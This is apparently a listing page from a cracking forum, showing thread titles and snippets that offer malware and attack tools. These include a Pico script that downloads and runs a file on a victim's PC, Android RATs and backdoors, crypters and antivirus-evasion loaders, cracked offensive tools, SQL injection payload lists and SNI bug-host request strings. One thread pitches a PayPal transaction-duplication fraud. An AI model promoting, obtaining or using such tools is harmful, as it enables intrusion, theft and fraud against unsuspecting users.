Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

  1. depth

    Multi/Others  🌟Creator payload🌟ARCANUS-master🌟

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  2. FaZe_Zee

    payload.dd script to use on raspberry pi pico /w

    Here is a script that basically opens up CMD and downloads a file using curl and executes it! https://www.mediafire.com/file/uurcpcvk98fris5/payload.dd/file Only works on windows! Curl needs to be installed on the victims PC for it to work! please feel free to edit this script for your needs
  3. nullsec

    HTML Smuggling Generator And Obfuscator For Your Red Team Operations

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  4. Rontribbiani

    SQL injection payload list

    SQL injection is a web security vulnerability that allows an attacker to interfere with queries an application makes to its database. It often allows attackers to see data they wouldn't normally have access to. Includes data belonging to the user or any other data accessible to the application...
  5. HiddenSale3

    USA/EU MIX  ✅ NEW! [PayPal] DUP Transaction 2023 Work

    PayPal Duplication Enter Transaction --------READ THIS----------- My team and I have recently managed to find an Inspecter method to duplicate incoming transitions if sent via bank accounts, to make the double transition work, just take the transaction code and add it inside the duplicator...
  6. Azarkaran

    HOW TO HACK ANDROID | COMPLETE CONTROL | ADVANCED BACKDOOR

    Step 1:Download apkeditorpro from Internet Step 2:open apkeditor and select your application Step 3:select commonedit option Step 4:scroll down on app and find target sdk version which might be upper then 25 Step 5:select target sdk version to 22 and click save apk and it will saved as signed...
  7. nobita.haxk

    Latest SQL injection payload 2023

    Copy It ❤️ *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  8. William N Nguyen

    🔥AndroRAT Simple Android Remote Administration🔥

    AndroRAT will work on device from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28) ================================================================================================================== %Features of AndroRAT% Full persistent backdoor Fully undetectable by any...
  9. b97er

    How to inject or bind payload into original app

    youtube video Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  10. mrkillerpro

    Login:Pass  Payload Crypter Resources

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  11. Flamengo

    APCLdr - Payload Loader With Evasion Features

    Payload Loader With Evasion Features. Features: no crt functions imported indirect syscalls using HellHall api hashing using CRC32 hashing algorithm payload encryption using rc4 - payload is saved in .rsrc Payload injection using APC calls - alertable thread Payload execution using APC -...
  12. miami

    payload cheat sheet

    bunch of useful payloads and bypass for Web Application Security SQL NOSQL API XSS LFI RACE CONDITION XXE RESOURCES CSRF DNS JSON PYTHON etc *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  13. Yazking130

    Method/Tut  Germany SNI Bug Host List (Aldi Talk, Ortel)

    Aldi Talk Payload "POST zero.alditalk-kundenbetreuung.de/datenvolumen-aufgebraucht.html/ HTTP/1.1[crlf]Connection: Keep-Alive[crlf]Content-Length: 100000000[crlf][crlf]" Ortel Payload "GET http://zero.o2online.de/lp/o2undsp-prepaid-wenig-guthaben// HTTP/1.1[crlf]Host...
  14. mohdjulaya

    Browser Detect My Payload

    hii frnds finally i was bypass all antivirus than i upload my virus on my personal host than try to download but suddenly browser detect this is a malicius file than i try to chack antiscan me website this is website show zero av detect i dont know why broswer detect my virus please help me...
  15. hemtoni

    Acordx Crypter Cracked / Encrypt Your Payload For Free By Hemtoni

    leave me like and comment Use with vmware or sandboxies. Function Vbs Crypter. Bitcoin Grabber. Assembly Changer. Sleep. Anti Remote Desktop. Anti Sandboxie. Hide File. Obfusactor. Hidden Startup. Download: https://anonfiles.com/7bhe5f90y6/Acordx_Crypter_rar Login panel bypassed.
  16. SaceGold

    Course/Tutorial Method/Tut  Social Engineering - A Girlfriend Tutorial For Hackers!

    This has been the quickest research I have ever done, Enjoy! *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  17. peebeekay

    Macro Pack Pro Cracked - 2022 Updated

    MacroPack Community is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack will...
  18. zerosum0x0

    |DcRat|SOURCE|[RUS|ENG]|Free|

    Полезная информация | Helpful information Привет всем, сегодня хочу поделится с вами обновлённой статьёй о бесплатном вирусе удалённого управления DcRat [Не DarkCrystal]. Hello everyone, today I want to share with you an updated article about the free remote control virus DcRat [Not...
  19. D

    How To QUICKLY Build Malware Documents 2021 (word, Excel, PPT, Etc..)

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  20. TDSf0x_X

    🛡 Shellter PRO V3.5 (Antivirus Evasion)🔥

    Download: :hyperwow: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** :ez:Features : 🔸️Dynamic Image Base Support 🔹️MSF 5/6 compatible stagers 🔸️Enhanced Anti-AV Signature Technology 🔹️Large Payloads Support 🔸️Upgraded Encoder...
  21. Amirxx60

    ALL-IN-ONE HACKING TOOL FOR HACKERS ADVANCED TOOLS AT ONE PLACE

    This is a collection which i use like on everyday basis. The knowledge is vast, keep learning. Give me a like and +rep if you liked it. Leechers get out. Foremost Warning: Noobs here? Dont even bother without having the tool knowledge. These tools are for the advanced linux users or who at...
  22. EBM833

    User:Pass  Fud payload

    Hi everyone can you please let me know how to make fud payload using Metasploit.
  23. Thanos Crax

    PayGen Tool - Generate Stable and Undetected Payload

    DL Tool: https://github.com/youhacker55/PayGen Video Tutorial: Features - Create Payload With MsfVenom Automated - Creates a handler.rc file - Undetectable - AutoPortForwarding(Ngrok) Screenshot: Scan Result:
Top Bottom